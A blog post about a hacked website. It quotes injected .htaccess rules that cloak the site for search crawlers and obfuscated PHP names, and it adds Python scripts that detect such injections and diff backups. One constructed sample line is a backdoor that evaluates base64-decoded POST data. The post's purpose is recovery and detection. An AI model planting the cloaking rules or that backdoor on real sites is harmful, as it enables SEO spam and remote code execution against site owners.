This site was hacked. A reader of the site noted that Google’s index of this site had been co-opted by dubious pharmaceutical offerings. I’ll gladly thank that individual publicly if they give me permission to do so; but my email reply got bounced as spam.
The immediate culprit was the addition of the following lines to a number of .htaccess files:
```apache
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo) [OR]
RewriteCond %{HTTP_REFERER} (google|aol|yahoo)
RewriteCond %{REQUEST_URI} /$ [OR]
RewriteCond %{REQUEST_FILENAME} (html|htm|php)$ [NC]
RewriteCond %{REQUEST_FILENAME} !common.php
RewriteRule ^.*$ /common.php [L]
</IfModule>
```
Read as Apache does (conditions are ANDed unless marked [OR]): any request that comes from a Google or Yahoo crawler or arrives via a Google, AOL or Yahoo referrer, and that is for a directory or an html/htm/php file other than common.php itself, is silently served by common.php instead. Ordinary visitors see the site as before, which is why the cloaking only showed up in Google's index.
I removed those lines, as well as the common.php file, and scanned any and all PHP files on my site. I saw the addition of lines such as the following:
```php
// "preg_replace" assembled from string fragments
$FYAqxDo='p'.'r'. 'eg_repl'. 'ace';...
// "preg_replace" again, this time via str_rot13
$IHxWfs=str_rot13('cert_ercynpr');...
// a name built by XORing two strings
$DcNZVHCi="eW6DLAlbeAki"^"...
// "base64_decode" assembled from string fragments
$LYDmvYopCKSSSGcfCVNpsskU='ba'.'se64_'.'deco'.'de'...
```
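Both artefacts above, the cloaking rules in .htaccess and the PHP function names assembled from fragments, can be checked for mechanically. The Python below is an added example, not code from this post or from its author: it flags RewriteCond lines keyed on search-engine user agents or referrers and catch-all RewriteRule lines, and it resolves the two obfuscation idioms seen here (literal concatenation and str_rot13) back to plain function names. The sample .htaccess and PHP are constructed to mirror the fragments quoted above (the XOR'd string is not reproduced because the page only shows it truncated), and the lists of engine names and dangerous function names are assumptions.

```python
import codecs
import re

# Constructed sample: the rewrite block quoted above, as it would sit in .htaccess.
SAMPLE_HTACCESS = """\
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo) [OR]
RewriteCond %{HTTP_REFERER} (google|aol|yahoo)
RewriteCond %{REQUEST_URI} /$ [OR]
RewriteCond %{REQUEST_FILENAME} (html|htm|php)$ [NC]
RewriteCond %{REQUEST_FILENAME} !common.php
RewriteRule ^.*$ /common.php [L]
</IfModule>
"""

# Constructed sample: obfuscation in the style of the fragments quoted above.
# The last line is an assumption about how such variables get used.
SAMPLE_PHP = """\
<?php
$FYAqxDo='p'.'r'. 'eg_repl'. 'ace';
$IHxWfs=str_rot13('cert_ercynpr');
$LYDmvYopCKSSSGcfCVNpsskU='ba'.'se64_'.'deco'.'de';
$FYAqxDo('/.*/e', $LYDmvYopCKSSSGcfCVNpsskU($_POST['x']), '');
"""

# Search-engine names that cloaking rules key on (assumed list).
ENGINES = r"(google|yahoo|bing|msn|aol|ask)"
BOT_COND_RE = re.compile(
    r"^\s*RewriteCond\s+%\{HTTP_(USER_AGENT|REFERER)\}\s+\S*" + ENGINES, re.I)
CATCHALL_RULE_RE = re.compile(r"^\s*RewriteRule\s+\^\.\*\$\s+(\S+)", re.I)


def find_cloaking(htaccess_text):
    """Return (kind, line) pairs for directives that select search-engine
    traffic, or that send every request to a single script."""
    hits = []
    for line in htaccess_text.splitlines():
        if BOT_COND_RE.search(line):
            hits.append(("bot-condition", line.strip()))
        elif CATCHALL_RULE_RE.search(line):
            hits.append(("catch-all-rewrite", line.strip()))
    return hits


# PHP expressions that build a function name without ever spelling it out.
ASSIGN_RE = re.compile(r"(\$\w+)\s*=\s*([^;]+);")
LITERAL_RE = re.compile(r"'([^']*)'")
CONCAT_RE = re.compile(r"^\s*'[^']*'(?:\s*\.\s*'[^']*')*\s*$")
ROT13_RE = re.compile(r"^\s*str_rot13\(\s*'([^']*)'\s*\)\s*$")

# Names whose dynamic construction is a strong sign of injected code (assumed list).
DANGEROUS = {"eval", "assert", "preg_replace", "base64_decode", "gzinflate",
             "gzuncompress", "str_rot13", "create_function", "system", "shell_exec"}


def resolve_expr(expr):
    """Evaluate the two idioms seen on this site: concatenation of literal
    fragments, and str_rot13 of a literal. Anything else (e.g. an XOR of two
    strings) is left unresolved."""
    m = ROT13_RE.match(expr)
    if m:
        return codecs.decode(m.group(1), "rot13")
    if CONCAT_RE.match(expr):
        return "".join(LITERAL_RE.findall(expr))
    return None


def deobfuscate_php_names(php_text):
    """Map each variable assigned from an obfuscated literal to the plain name."""
    names = {}
    for var, expr in ASSIGN_RE.findall(php_text):
        resolved = resolve_expr(expr)
        if resolved is not None:
            names[var] = resolved
    return names


def flag_dangerous(php_text):
    """Variables that resolve to a DANGEROUS function, plus a separate finding
    when a resolved preg_replace is called with the /e modifier, which evaluates
    the replacement as PHP code (PHP 5; removed in PHP 7)."""
    names = deobfuscate_php_names(php_text)
    findings = sorted((var, name) for var, name in names.items() if name in DANGEROUS)
    for var, name in names.items():
        if name == "preg_replace" and re.search(
                re.escape(var) + r"\(\s*'[^']*/[a-z]*e[a-z]*'", php_text):
            findings.append((var, "preg_replace with /e modifier"))
    return findings


if __name__ == "__main__":
    for kind, line in find_cloaking(SAMPLE_HTACCESS):
        print(f"{kind:18} {line}")
    for var, what in flag_dangerous(SAMPLE_PHP):
        print(f"{var:28} -> {what}")
```

Run it over every .htaccess and .php file under the web root rather than the constructed samples; a hit on a bot-keyed RewriteCond, or on a variable that resolves to preg_replace or base64_decode, is the cue to pull the file from a clean backup.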
I had old (vintage 2006) installations of PHP-openid-1.2.1 and PHP-yadis-1.0.2 that I am tentatively assuming were the ports of initial entry.
I also wiped my .ssh directory. It held a private key that had been generated for this site; presumably it was legitimate, but I never used it, and I now presume it compromised. I never initiate sessions from this host, nor do I have any passwords saved there, so any damage caused was isolated.
I do daily backups of my site, which I keep for a week, as well as monthly backups that I basically keep forever. In addition, as I recently migrated hosts, I have a hot backup.
The PHP hacks were done after I migrated but before March 1st. The .htaccess hacks were done over a week ago, but after March 1st.
Over the next few days, I’ll be looking at diffs of different snapshots of my site contents to see if there is anything else I missed.
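As an added example of the snapshot comparison described here (not code from this post or from its author), the Python below hashes every file in two snapshot directories, reports what was added, removed or changed, and produces a unified diff for each changed file, so a dropped-in common.php or a line prepended to index.php stands out immediately. The before and after trees are constructed in temporary directories to stand in for two backups; the injected content in them is modelled on the .htaccess and PHP fragments quoted earlier in the post.

```python
import difflib
import hashlib
import tempfile
from pathlib import Path


def snapshot(root):
    """Map every file under root (path relative to root) to its SHA-256 digest.
    Path.rglob, unlike a shell glob, also matches dot-files such as .htaccess."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*") if p.is_file()}


def compare_snapshots(old, new):
    """Classify paths by how the two digest maps differ."""
    return {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "modified": sorted(p for p in set(old) & set(new) if old[p] != new[p]),
    }


def file_diff(old_root, new_root, relpath, context=1):
    """Unified diff of one file between the two snapshot directories."""
    a = (Path(old_root) / relpath).read_text().splitlines()
    b = (Path(new_root) / relpath).read_text().splitlines()
    return list(difflib.unified_diff(a, b, f"old/{relpath}", f"new/{relpath}",
                                     n=context, lineterm=""))


def write_tree(root, files):
    """Materialise a {relative path: content} mapping under root."""
    for rel, content in files.items():
        path = Path(root) / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(content)


def demo():
    """Constructed snapshots: a clean site, and the same site after an injection
    modelled on the fragments quoted in the post (all contents are made up)."""
    clean = {
        ".htaccess": "RewriteEngine On\nRewriteRule ^blog/(.*)$ /index.php?p=$1 [L]\n",
        "index.php": "<?php\nrequire 'lib/app.php';\nrun();\n",
        "lib/app.php": "<?php\nfunction run() { echo 'hello'; }\n",
    }
    hacked = dict(clean)
    hacked[".htaccess"] = (
        "<IfModule mod_rewrite.c>\nRewriteEngine On\n"
        "RewriteCond %{HTTP_USER_AGENT} (google|yahoo) [OR]\n"
        "RewriteCond %{HTTP_REFERER} (google|aol|yahoo)\n"
        "RewriteRule ^.*$ /common.php [L]\n</IfModule>\n" + clean[".htaccess"])
    hacked["common.php"] = "<?php\n$IHxWfs=str_rot13('cert_ercynpr');\n"
    hacked["index.php"] = ("<?php\n$FYAqxDo='p'.'r'.'eg_repl'.'ace';\n"
                           "require 'lib/app.php';\nrun();\n")

    with tempfile.TemporaryDirectory() as old_root, tempfile.TemporaryDirectory() as new_root:
        write_tree(old_root, clean)
        write_tree(new_root, hacked)
        report = compare_snapshots(snapshot(old_root), snapshot(new_root))
        report["diffs"] = {p: file_diff(old_root, new_root, p) for p in report["modified"]}
    return report


if __name__ == "__main__":
    result = demo()
    for kind in ("added", "removed", "modified"):
        print(f"{kind}: {result[kind]}")
    for lines in result["diffs"].values():
        print("\n".join(lines))
```

Against real backups, point snapshot() at the extracted daily and monthly copies; comparing the oldest snapshot that predates the migration with the most recent one bounds the injection window, and comparing consecutive dailies narrows it to a day.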
From that article:
these attacks have almost universally been due to insecure website software running on the site in question
I have every reason to believe that this is true in my case.
To Dreamhost’s credit, I recently was the victim of another type of hack, where every PHP file on my site was prepended with a base64 encoded exploit. I was able to automatically revert the changes thanks to having installed WordPress and Mediawiki with Subversion, but I had a handful of other files (e.g. WordPress theme files) that were not under version control. I alerted Dreamhost to the attack, and they ran a script that scanned all the files in my account, cleaned the still affected files, made backups of the files they cleaned, and generated a very comprehensive email with all the details of what they did, and what I needed to do. I have to say, I was impressed. Sam, feel free to contact support and request a security scan just to be sure.
As an interesting aside, in my case, when I decoded the exploit, I could tell that the code specifically did not want to load when the page was requested by a search bot. This seems counter-intuitive, except that when Google discovers a site serving up malware for a period of time, they’ll drop you from their index, which means no more page views for our malware-friends. Which is kind of brilliant. The old hacks were all about SEO and Google Juice. The new hacks are all about money: ads and malware.